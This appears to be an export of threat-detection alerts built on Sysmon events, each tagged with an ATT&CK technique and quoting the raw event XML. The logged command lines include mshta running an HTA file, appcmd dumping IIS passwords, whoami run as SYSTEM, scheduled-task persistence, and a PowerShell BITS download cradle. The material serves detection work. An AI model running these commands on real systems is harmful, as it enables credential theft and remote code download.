[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-08-07T23:33:01.103287Z"">
</TimeCreated>
<EventRecordID>556720</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3232"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-08-07 23:33:01.091</Data>
<Data Name=""ProcessGuid"">747F3D96-182D-610F-0000-00106F40D300</Data>
<Data Name=""ProcessId"">9932</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">MSHTA.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\SysWOW64\mshta.exe&quot; &quot;C:\Users\Public\memViewData.hta&quot; {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1231-610F-0000-002057A80700</Data>
<Data Name=""LogonId"">0x7a857</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989</Data>
<Data Name=""ParentProcessGuid"">747F3D96-1239-610F-0000-0010D0210A00</Data>
<Data Name=""ParentProcessId"">600</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.473868Z"">
</TimeCreated>
<EventRecordID>5961</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.433</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00100FC7FF00</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1589069393.260757,2020-05-10T04:09:53.260757+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-10T00:09:43.372595Z"">
</TimeCreated>
<EventRecordID>112972</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2728"" ThreadID=""3432"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-10 00:09:43.370</Data>
<Data Name=""ProcessGuid"">747F3D96-4647-5EB7-0000-0010B3454B01</Data>
<Data Name=""ProcessId"">7672</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">whoami.exe</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Tools\PrivEsc\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3B92-5EB5-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
<Data Name=""ParentProcessGuid"">747F3D96-4640-5EB7-0000-0010EF364B01</Data>
<Data Name=""ParentProcessId"">372</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.403767,2019-05-27T05:29:19.403767+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.403767Z"">
</TimeCreated>
<EventRecordID>5958</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.353</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00104FC3FF00</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564913815.299641,2019-08-04T14:16:55.299641+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-04T10:16:50.455910Z"">
</TimeCreated>
<EventRecordID>5951</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-04 10:16:50.403</Data>
<Data Name=""ProcessGuid"">747F3D96-B092-5D46-0000-001089041204</Data>
<Data Name=""ProcessId"">7792</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
<Data Name=""ParentProcessId"">820</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1603490256.411768,2020-10-24T01:57:36.411768+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:36.399534Z"">
</TimeCreated>
<EventRecordID>424076</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:36.394</Data>
<Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-0010B2B35B00</Data>
<Data Name=""ProcessId"">5572</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
<Data Name=""LogonId"">0x8a585</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
<Data Name=""ParentProcessId"">3396</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1595802375.141778,2020-07-27T02:26:15.141778+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-26T22:26:15.141764Z"">
</TimeCreated>
<EventRecordID>339223</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3332"" ThreadID=""3580"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-26 22:13:19.375</Data>
<Data Name=""ProcessGuid"">747F3D96-FF9D-5F1D-0000-00100AC62400</Data>
<Data Name=""ProcessId"">7400</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">127.0.0.1</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">49796</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">127.0.0.1</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10</Data>
<Data Name=""DestinationPort"">445</Data>
<Data Name=""DestinationPortName"">microsoft-ds</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.323652,2019-05-27T05:29:19.323652+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.323652Z"">
</TimeCreated>
<EventRecordID>5955</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.283</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-00108FBFFF00</Data>
<Data Name=""ProcessId"">168</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Filename: redirection.config&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
</TimeCreated>
<EventRecordID>4895</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
<Data Name=""ProcessId"">6720</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ParentProcessId"">2948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
